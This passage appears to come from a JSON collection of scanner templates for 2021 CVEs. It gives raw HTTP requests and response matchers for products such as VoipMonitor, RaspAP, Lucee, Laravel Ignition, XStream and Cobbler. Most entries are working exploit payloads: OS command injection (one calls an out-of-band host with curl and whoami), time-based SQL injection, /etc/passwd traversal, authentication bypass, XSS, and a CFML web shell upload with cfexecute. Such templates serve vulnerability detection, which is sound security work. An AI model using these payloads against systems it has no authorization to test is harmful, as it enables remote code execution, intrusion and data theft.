\"custom-facebook-feed\")"],"condition":"and"}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","<h1>FV Player Stats</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33357","info":{"name":"RaspAP <=2.6.5 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["DHCPEnabled"]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-39327","info":{"name":"WordPress BulletProof Security 5.1 Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt","{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BPS DB BACKUP LOG","=================="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25899","info":{"name":"Void Aural Rec Monitor 9.0.0.1 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /AurallRECMonitor/services/svc-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparam1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Contacte con el administrador\")"],"condition":"and"}]}]},{"id":"CVE-2021-40908","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo 'CVE-2021-24236'; ?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"word","part":"body_2","words":["CVE-2021-24236"]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET 